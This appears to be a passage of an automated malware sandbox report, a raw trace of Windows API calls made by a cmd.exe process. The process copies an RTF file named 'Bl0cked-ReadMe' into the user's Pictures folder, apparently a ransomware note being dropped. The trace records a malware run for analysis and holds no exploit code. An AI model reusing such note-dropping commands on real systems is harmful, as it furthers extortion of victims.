entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 16093 start_va = 0x690000 end_va = 0x128ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Thread: id = 237 os_tid = 0xf94 [0141.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf91c | out: lpSystemTimeAsFileTime=0x2cf91c*(dwLowDateTime=0x8e68e220, dwHighDateTime=0x1d440a9)) [0141.724] GetCurrentProcessId () returned 0xfa0 [0141.724] GetCurrentThreadId () returned 0xf94 [0141.724] GetTickCount () returned 0x2c689 [0141.724] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf914 | out: lpPerformanceCount=0x2cf914*=19851315308) returned 1 [0141.724] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.724] __set_app_type (_Type=0x1) [0141.725] __p__fmode () returned 0x76b331f4 [0141.725] __p__commode () returned 0x76b331fc [0141.725] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.725] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.725] GetCurrentThreadId () returned 0xf94 [0141.725] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf94) returned 0x38 [0141.725] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.725] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.725] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.725] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.725] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf8ac | out: phkResult=0x2cf8ac*=0x0) returned 0x2 [0141.725] VirtualQuery (in: lpAddress=0x2cf8e3, lpBuffer=0x2cf87c, 
dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.725] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf87c, dwLength=0x1c | out: lpBuffer=0x2cf87c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.726] GetConsoleOutputCP () returned 0x1b5 [0141.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.726] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.726] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.726] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.726] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.726] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 
1 [0141.727] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.727] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.727] GetEnvironmentStringsW () returned 0x400168* [0141.727] FreeEnvironmentStringsW (penv=0x400168) returned 1 [0141.727] GetEnvironmentStringsW () returned 0x400168* [0141.727] FreeEnvironmentStringsW (penv=0x400168) returned 1 [0141.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce81c | out: phkResult=0x2ce81c*=0x40) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x90, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x0, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x4) 
returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegCloseKey (hKey=0x40) returned 0x0 [0141.727] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce81c | out: phkResult=0x2ce81c*=0x40) returned 0x0 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x40, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.727] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x1, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x0, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x9, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x4, lpData=0x2ce828*=0x9, lpcbData=0x2ce820*=0x4) returned 0x0 [0141.728] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce824, lpData=0x2ce828, lpcbData=0x2ce820*=0x1000 | out: lpType=0x2ce824*=0x0, lpData=0x2ce828*=0x9, lpcbData=0x2ce820*=0x1000) returned 0x2 [0141.728] RegCloseKey (hKey=0x40) returned 0x0 [0141.728] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.728] srand (_Seed=0x5b886370) [0141.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0141.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0141.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.728] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.728] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.728] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.728] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.728] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.728] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.728] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.729] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.729] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.729] _wcsicmp 
(_String1="PROMPT", _String2="TIME") returned -4 [0141.729] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.729] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.729] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.729] GetEnvironmentStringsW () returned 0x4022b8* [0141.729] FreeEnvironmentStringsW (penv=0x4022b8) returned 1 [0141.729] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.729] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.729] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.729] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.729] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.729] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.729] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.729] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.729] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.729] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.729] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5e8, lpFilePart=0x2cf5e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf5e4*="Desktop") returned 0x18 [0141.729] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.729] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf364 | out: lpFindFileData=0x2cf364) returned 0x3ffff8 [0141.729] FindClose (in: hFindFile=0x3ffff8 | out: hFindFile=0x3ffff8) returned 1 [0141.730] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf364 | out: lpFindFileData=0x2cf364) returned 0x3ffff8 [0141.730] FindClose (in: hFindFile=0x3ffff8 | out: hFindFile=0x3ffff8) returned 1 [0141.730] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf364 | out: lpFindFileData=0x2cf364) returned 0x3ffff8 [0141.730] FindClose (in: hFindFile=0x3ffff8 | out: hFindFile=0x3ffff8) returned 1 [0141.730] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.730] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.730] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.730] GetEnvironmentStringsW () returned 0x402ad8* [0141.730] FreeEnvironmentStringsW (penv=0x402ad8) returned 1 [0141.730] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.731] GetConsoleOutputCP () returned 0x1b5 [0141.731] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.731] GetUserDefaultLCID () returned 0x409 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf728, cchData=128 | out: lpLCData="0") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf728, cchData=128 | out: lpLCData="0") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf728, cchData=128 | out: lpLCData="1") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.731] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.731] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.732] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.732] GetConsoleTitleW (in: lpConsoleTitle=0x3f08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.732] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.732] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.733] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.733] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.733] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.733] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.733] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0141.733] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.733] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.733] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.733] _wcsicmp (_String1="REM/?", 
_String2="type") returned -2 [0141.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.737] GetFileType (hFile=0x7) returned 0x2 [0141.737] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.737] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf620 | out: lpMode=0x2cf620) returned 1 [0141.737] _dup (_FileHandle=1) returned 3 [0141.737] _close (_FileHandle=1) returned 0 [0141.737] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0141.737] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf5f0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0141.739] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0141.739] GetConsoleTitleW (in: lpConsoleTitle=0x2cf420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.739] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0141.739] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0141.739] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0141.739] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0141.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.740] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cef84, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cef84) returned 0x3f0e50 [0141.740] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0141.740] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0141.740] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0141.740] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cde90, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0141.740] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] GetFileType (hFile=0x54) returned 0x1 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2cdee8 | out: lpFileSizeHigh=0x2cdee8*=0x0) returned 0x1632 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.740] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.741] GetFileType (hFile=0x4c) returned 0x1 [0141.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.741] GetFileType (hFile=0x4c) returned 0x1 [0141.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.741] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: 
hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] GetFileType (hFile=0x4c) returned 0x1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.742] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, 
nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.742] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, 